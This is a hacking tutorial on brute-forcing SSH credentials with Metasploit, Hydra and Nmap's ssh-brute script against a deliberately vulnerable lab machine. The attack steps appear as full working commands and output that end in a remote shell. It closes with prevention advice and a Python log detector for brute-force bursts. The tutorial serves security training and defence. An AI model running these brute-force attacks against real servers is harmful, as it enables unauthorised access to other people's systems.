How to Get SSH Access to Servers by Brute-Forcing Credentials « Null Byte :: WonderHowTo



SSH is one of the most common protocols in modern IT infrastructures, and because of this it can be a valuable attack vector for hackers. One of the most reliable ways to gain SSH access to a server is by brute-forcing credentials. There are a few methods for performing an SSH brute-force attack, all of which ultimately lead to the discovery of valid login credentials.

Although they are not the only ways to do this, we will explore tools like Metasploit, Hydra and the Nmap Scripting Engine to perform this task, all of which are included in Kali Linux. As for the target, we will practice on Metasploitable 2, a deliberately vulnerable virtual machine intended for security training and research.

Overview of SSH

SSH, which stands for Secure Shell, is a network protocol that provides encrypted communication over an unsecured network. It was developed as a replacement for Telnet, which sends everything in plain text; clearly a problem, especially when passwords are involved.

SSH operates on a client-server model: the client initiates a connection to the server, and communication is established once authentication succeeds. SSH supports both password and key-based authentication, the latter of which is considered more secure.

Recommended reading: SSH, The Secure Shell: The Definitive Guide

Uses for SSH include providing a means for remote login and command execution, file transfer, mobile development, and connection troubleshooting in cloud-based applications. Almost every large company implements SSH in one way or another, which makes it a valuable technology to become acquainted with.

Scan with Nmap

Before we begin brute-forcing, we need to determine the state of the port that SSH runs on. We can perform a simple Nmap scan to see whether it is open. Rather than scanning all the default ports, we can specify a single port number with the -p flag.

  nmap 172.16.1.102 -p 22
  Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 14:58 CST
  Nmap scan report for 172.16.1.102
  Host is up (0.0039s latency).

  PORT   STATE SERVICE
  22/tcp open  ssh
  MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)

  Nmap done: 1 IP address (1 host up) scanned in 13.33 seconds

Above we can see that port 22 is open and the SSH service is running on it. Brute-forcing would be a waste of time if the port were closed or the service weren't running at all. Now we can start brute-forcing.

Method 1: Metasploit

The first method we will try today uses one of Metasploit's auxiliary scanners. First, start the PostgreSQL database with the following command.

  service postgresql start 

Now we can fire up Metasploit by typing msfconsole in the terminal. You should see an "msf" prompt appear, though for me it is "msf5" because I am running the latest version, Metasploit 5, which you get by upgrading to the latest version of Kali. It is always a good idea to stay updated to take advantage of the latest features and tools. Here is the command I use to update:

  apt-get update && apt-get dist-upgrade 

Next, after being greeted by the msfconsole welcome banner, we can find the appropriate module with the search command.

  search ssh
  Matching Modules
  ================

     Name                                                  Disclosure Date  Rank    Check  Description
     ----                                                  ---------------  ----    -----  -----------
     auxiliary/dos/windows/ssh/sysax_sshd_kexchange        2013-03-17       normal  No     Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
     auxiliary/fuzzers/ssh/ssh_kexinit_corrupt                              normal  No     SSH Key Exchange Init Corruption
     auxiliary/fuzzers/ssh/ssh_version_15                                   normal  No     SSH 1.5 Version Fuzzer
     auxiliary/fuzzers/ssh/ssh_version_2                                    normal  No     SSH 2.0 Version Fuzzer
     auxiliary/fuzzers/ssh/ssh_version_corrupt                              normal  No     SSH Version Corruption
     auxiliary/scanner/http/cisco_firepower_login                           normal  Yes    Cisco Firepower Management Console 6.0 Login
     auxiliary/scanner/http/gitlab_user_enum               2014-11-21       normal  Yes    GitLab User Enumeration
     auxiliary/scanner/ssh/apache_karaf_command_execution  2016-02-09       normal  Yes    Apache Karaf Default Credentials Command Execution
     auxiliary/scanner/ssh/cerberus_sftp_enumusers         2014-05-27       normal  Yes    Cerberus FTP Server SFTP Username Enumeration
     auxiliary/scanner/ssh/detect_kippo                                     normal  Yes    Kippo SSH Honeypot Detector
     auxiliary/scanner/ssh/eaton_xpert_backdoor            2018-07-18       normal  Yes    Eaton Xpert Meter SSH Private Key Exposure Scanner
     auxiliary/scanner/ssh/fortinet_backdoor               2016-01-09       normal  Yes    Fortinet SSH Backdoor Scanner
     auxiliary/scanner/ssh/juniper_backdoor                2015-12-20       normal  Yes    Juniper SSH Backdoor Scanner
     auxiliary/scanner/ssh/karaf_login                                      normal  Yes    Apache Karaf Login Utility
     auxiliary/scanner/ssh/libssh_auth_bypass              2018-10-16       normal  Yes    libssh Authentication Bypass Scanner
     auxiliary/scanner/ssh/ssh_enumusers                                    normal  Yes    SSH Username Enumeration
     auxiliary/scanner/ssh/ssh_identify_pubkeys                             normal  Yes    SSH Public Key Acceptance Scanner
     auxiliary/scanner/ssh/ssh_login                                        normal  Yes    SSH Login Check Scanner
     auxiliary/scanner/ssh/ssh_login_pubkey                                 normal  Yes    SSH Public Key Login Scanner
     auxiliary/scanner/ssh/ssh_version                                      normal  Yes    SSH Version Scanner

  ...

The ssh_login module is exactly what we need. Load it with the use command. The prompt should then read "msf5 auxiliary(scanner/ssh/ssh_login)", so you know you're working in the right place.

  use auxiliary/scanner/ssh/ssh_login

Then we can type options to show the available settings for the scanner.

  options
  Module options (auxiliary/scanner/ssh/ssh_login):

     Name              Current Setting  Required  Description
     ----              ---------------  --------  -----------
     BLANK_PASSWORDS   false            no        Try blank passwords for all users
     BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
     DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
     DB_ALL_PASS       false            no        Add all passwords in the current database to the list
     DB_ALL_USERS      false            no        Add all users in the current database to the list
     PASSWORD                           no        A specific password to authenticate with
     PASS_FILE                          no        File containing passwords, one per line
     RHOSTS                             yes       The target address range or CIDR identifier
     RPORT             22               yes       The target port
     STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
     THREADS           1                yes       The number of concurrent threads
     USERNAME                           no        A specific username to authenticate as
     USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
     USER_AS_PASS      false            no        Try the username as the password for all users
     USER_FILE                          no        File containing usernames, one per line
     VERBOSE           false            yes       Whether to print output for all attempts

We need to set a few things for this to work correctly. First, RHOSTS is the target's IP address.

  set rhosts 172.16.1.102
  rhosts => 172.16.1.102

Next, STOP_ON_SUCCESS will stop the scan once valid credentials are found.

  set stop_on_success true
  stop_on_success => true

Then USER_FILE is a list of usernames.

  set user_file users.txt
  user_file => users.txt

And PASS_FILE is a list of passwords.

  set pass_file passwords.txt
  pass_file => passwords.txt

Finally, there is VERBOSE, which will show every attempt.

  set verbose true
  verbose => true

For the user and password files, I used an abbreviated list of known default credentials for this demonstration. In a real attack, you would probably want to use one of the well-known wordlists or a custom list that suits your needs.

We should be all set now. Type run at the prompt to kick it off:

  run
  [-] 172.16.1.102:22 - Failed: 'user:password'
  [-] 172.16.1.102:22 - Failed: 'user:Password123'
  [-] 172.16.1.102:22 - Failed: 'user:msfadmin'
  [-] 172.16.1.102:22 - Failed: 'user:admin'
  [-] 172.16.1.102:22 - Failed: 'user:default'
  [-] 172.16.1.102:22 - Failed: 'user:root'
  [-] 172.16.1.102:22 - Failed: 'user:toor'
  [-] 172.16.1.102:22 - Failed: 'user:hey'
  [-] 172.16.1.102:22 - Failed: 'user:welcome'
  [-] 172.16.1.102:22 - Failed: 'user:hunter2'
  [-] 172.16.1.102:22 - Failed: 'msfadmin:password'
  [-] 172.16.1.102:22 - Failed: 'msfadmin:Password123'
  [+] 172.16.1.102:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
  [*] Command shell session 1 opened (172.16.1.100:37615 -> 172.16.1.102:22) at 2019-02-26 15:06:58 -0600
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed

Since we set the verbose option, we can see every attempt as it is made. Depending on the number of username and password combinations, this can take quite some time to run.

When valid credentials are found, a success message is displayed and a command shell is opened. It doesn't automatically drop us into it, so we can view the currently active sessions with the sessions command.

  sessions
  Active sessions
  ===============

    Id  Name  Type         Information                              Connection
    --  ----  ----         -----------                              ----------
    1         shell linux  SSH msfadmin:msfadmin (172.16.1.102:22)  172.16.1.100:37615 -> 172.16.1.102:22 (172.16.1.102)

This tells us it is an SSH connection. To interact with the session, use the -i flag followed by its Id.

  sessions -i 1
  [*] Starting interaction with 1...

  id
  uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)

Now we are connected to the target over SSH and can run commands as usual.

Method 2: Hydra

The next tool we will use is Hydra, a powerful login cracker that is very fast and supports a number of different protocols. To display the help and some basic usage options, simply type hydra in the terminal. (Note: if you were still in msfconsole, make sure you exit it before using Hydra.)

  hydra
  Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

  Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

  Options:
    -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
    -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
    -C FILE   colon separated "login:pass" format, instead of -L/-P options
    -M FILE   list of servers to attack, one entry per line, ':' to specify port
    -t TASKS  run TASKS number of connects in parallel per target (default: 16)
    -U        service module usage details
    -h        more command line options (COMPLETE HELP)
    server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
    service   the service to crack (see below for supported protocols)
    OPT       some service modules support additional input (-U for module help)

  Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

  Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
  v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
  Don't use in military or secret service organizations, or for illegal purposes.

  Example:  hydra -l user -P passlist.txt ftp://192.168.0.1

Hydra has a number of options, but today we will use the following:

  • The -L flag, which specifies a list of login names.
  • The -P flag, which specifies a list of passwords.
  • ssh://172.16.1.102, which is our target and the protocol.
  • The -t flag set to 4, which specifies the number of parallel tasks to run.

Once we kick it off, the tool displays the status of the attack:

  hydra -L users.txt -P passwords.txt ssh://172.16.1.102 -t 4
  Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-02-26 15:12:47
  [DATA] max 4 tasks per 1 server, overall 4 tasks, 90 login tries (l:9/p:10), ~23 tries per task
  [DATA] attacking ssh://172.16.1.102:22/

After a while, it will complete and show us the number of valid logins it found.

  [22][ssh] host: 172.16.1.102   login: msfadmin   password: msfadmin
  [STATUS] 44.00 tries/min, 44 tries in 00:01h, 46 to do in 00:02h, 4 active
  [STATUS] 42.00 tries/min, 84 tries in 00:02h, 6 to do in 00:01h, 4 active
  1 of 1 target successfully completed, 1 valid password found
  Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-02-26 15:15:10

Hydra's parallel processing makes it a good choice when a large number of potential credentials are involved.

Method 3: Nmap Scripting Engine

The last method for brute-forcing SSH credentials that we will try today uses the Nmap Scripting Engine. NSE contains a script that will attempt to brute-force all possible combinations of username and password pairs. To perform this attack, we can run a simple Nmap scan from a new terminal, just as before, but with a few additional options tacked on:

  • --script ssh-brute specifies the script to use.
  • --script-args specifies the arguments for the script, separated by commas.
  • userdb=users.txt is the list of usernames we want to use.
  • passdb=passwords.txt is the list of passwords we want to use.

Now we are ready to start the scan:

  nmap 172.16.1.102 -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt
  Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 15:17 CST

NSE will show the brute-force attempts and which credentials are being tried. Be patient; depending on how many usernames and passwords are used, it may take some time.

  NSE: [ssh-brute] Trying username/password pair: user:user
  NSE: [ssh-brute] Trying username/password pair: msfadmin:msfadmin
  NSE: [ssh-brute] Trying username/password pair: admin:admin
  NSE: [ssh-brute] Trying username/password pair: root:root
  NSE: [ssh-brute] Trying username/password pair: john:john
  NSE: [ssh-brute] Trying username/password pair: default:default
  NSE: [ssh-brute] Trying username/password pair: support:support
  NSE: [ssh-brute] Trying username/password pair: service:service
  NSE: [ssh-brute] Trying username/password pair: adam:adam
  NSE: [ssh-brute] Trying username/password pair: admin:password
  NSE: [ssh-brute] Trying username/password pair: root:password
  NSE: [ssh-brute] Trying username/password pair: john:password
  NSE: [ssh-brute] Trying username/password pair: default:password
  NSE: [ssh-brute] Trying username/password pair: support:password
  NSE: [ssh-brute] Trying username/password pair: adam:password
  NSE: [ssh-brute] Trying username/password pair: admin:Password123
  NSE: [ssh-brute] Trying username/password pair: root:Password123
  NSE: [ssh-brute] Trying username/password pair: john:Password123
  NSE: [ssh-brute] Trying username/password pair: default:Password123

  ...

After a while, the scan will complete and a report will be displayed in the terminal.

  Nmap scan report for 172.16.1.102
  Host is up (0.0011s latency).

  PORT   STATE SERVICE
  22/tcp open  ssh
  | ssh-brute:
  |   Accounts:
  |     user:user - Valid credentials
  |     msfadmin:msfadmin - Valid credentials
  |     service:service - Valid credentials
  |_  Statistics: Performed 66 guesses in 124 seconds, average tps: 0.5
  MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)

  Nmap done: 1 IP address (1 host up) scanned in 147.59 seconds

Above we can see that it found three valid credential pairs. This script is useful because it tries every possible combination of username and password, which sometimes yields more results than the other tools.

How to Prevent SSH Brute-Force

The reality is that if you have a server facing the internet, there will be many SSH brute-force attempts against it every day, most of them automated. But don't despair: there are a few simple measures that protect against this and reduce the number of login attempts.

Perhaps one of the easiest things to do is change the port number that SSH listens on. Although this will deter the most rudimentary brute-force attempts, it is trivial to scan for SSH running on alternative ports, so it is no substitute for the measures below.

A better method is to implement a service such as Fail2ban, DenyHosts or iptables rules to block brute-force attempts at the host level. This, combined with using key-based authentication instead of passwords, will put you out of reach of most attackers. If password-based authentication is absolutely necessary, use strong passwords and follow best practices.
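As an added example (not part of the original article or any of the tools it covers), here is a small Python detector in the spirit of Fail2ban: it reads OpenSSH auth-log lines, flags any source address that exceeds a failure threshold inside a short window, and reports a successful login that later arrives from an already-flagged source, which is exactly the trail the Metasploit and Hydra runs above leave in the target's log. The host name, addresses and log lines are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH auth-log patterns that matter for brute-force detection.
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\S+) port \d+")
TIMESTAMP = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d)")

def parse_ts(line, year=2019):
    """Parse the syslog timestamp that starts a line (syslog omits the year)."""
    return datetime.strptime(f"{year} {TIMESTAMP.match(line).group(1)}", "%Y %b %d %H:%M:%S")

def analyze(lines, threshold=5, window_seconds=60):
    """Return (suspects, compromised): sources with >= threshold failures inside
    window_seconds, and (user, source) pairs where a login later succeeded from a suspect."""
    recent = defaultdict(list)  # source -> failure timestamps still inside the window
    suspects, compromised = set(), []
    for line in lines:
        ts = parse_ts(line)
        m = FAILED.search(line)
        if m:
            src = m.group(2)
            recent[src] = [t for t in recent[src] if (ts - t).total_seconds() <= window_seconds]
            recent[src].append(ts)
            if len(recent[src]) >= threshold:
                suspects.add(src)
            continue
        m = ACCEPTED.search(line)
        if m and m.group(2) in suspects:
            compromised.append((m.group(1), m.group(2)))
    return suspects, compromised

# Constructed sample log modelled on the Metasploit run above (not a real capture):
# six quick failures from one source, one stray failure from a legitimate admin, then a success.
ATTACKER = "172.16.1.100"
SAMPLE_LOG = [
    f"Feb 26 15:06:{40 + i:02d} metasploitable sshd[20{i:02d}]: Failed password for {u} "
    f"from {ATTACKER} port {37600 + i} ssh2"
    for i, u in enumerate(["user", "user", "user", "msfadmin", "msfadmin", "msfadmin"])
] + [
    "Feb 26 15:06:50 metasploitable sshd[2100]: Failed password for alice from 172.16.1.50 port 40001 ssh2",
    "Feb 26 15:06:52 metasploitable sshd[2101]: Accepted publickey for alice from 172.16.1.50 port 40002 ssh2",
    f"Feb 26 15:06:58 metasploitable sshd[2110]: Accepted password for msfadmin from {ATTACKER} port 37615 ssh2",
]

def run_sample():
    """Run the detector over the constructed log; returns ({'172.16.1.100'}, [('msfadmin', '172.16.1.100')])."""
    return analyze(SAMPLE_LOG)

if __name__ == "__main__":
    suspects, compromised = run_sample()
    print("suspects:", sorted(suspects), "success after burst:", compromised)
```

A hit in the second list is the one that matters: a blocked source is a nuisance, but a success from a source that was just guessing means the password has to be rotated and that host treated as compromised.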

Wrapping Up

In this guide we learned about SSH and how to brute-force credentials to gain access to a target. First, we covered how to identify open ports running SSH. Then we learned how to mount a brute-force attack with three methods: Metasploit, Hydra and the Nmap Scripting Engine. Finally, we went over some ways to protect against these types of attacks.

SSH is an extremely common protocol, so it's important that every hacker knows how to attack it, and how to defend against those attacks.

Cover image by Skitterphoto/Pexels; screenshots by drd_/Null Byte
